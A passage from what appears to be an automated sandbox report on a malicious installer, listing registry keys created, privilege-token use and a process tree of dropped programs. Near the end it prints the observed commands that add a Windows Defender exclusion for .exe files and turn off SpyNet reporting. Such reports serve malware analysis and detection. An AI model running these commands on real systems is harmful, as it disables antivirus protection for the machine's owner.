| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings | C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SoundBose.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\fontview.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\fontview.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\best_hack.zip_id23904541.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\best_hack.zip_id23904541.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\best_hack.zip_id23904541.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\best_hack.zip_id23904541.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe
"C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"
C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp" /SL5="$E005E,4965743,52224,C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"
C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1616 -ip 1616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 140
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Reg Organizer 6"
C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe" ad9ff40ab2841a8973dbdb0a6dca746b
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1096
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1480
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 948
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1924
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Documents\best_hack.zip_id23904541.exe
"C:\Users\Admin\Documents\best_hack.zip_id23904541.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2172
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2228
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2252
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2240
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2252
C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe
C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe /VERYSILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 848 -p 1800 -ip 1800
C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe
C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260
C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp" /SL5="$10302,2567431,54272,C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe"
C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe
C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2332
C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe
"C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe"
C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800
C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe
C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe /S /site_id=757674
C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe
C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b
C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp" /SL5="$30336,990754,54272,C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Scan Rename"
C:\Program Files (x86)\ScanRename\ScanRename.exe
"C:\Program Files (x86)\ScanRename\ScanRename.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1332
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2084
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
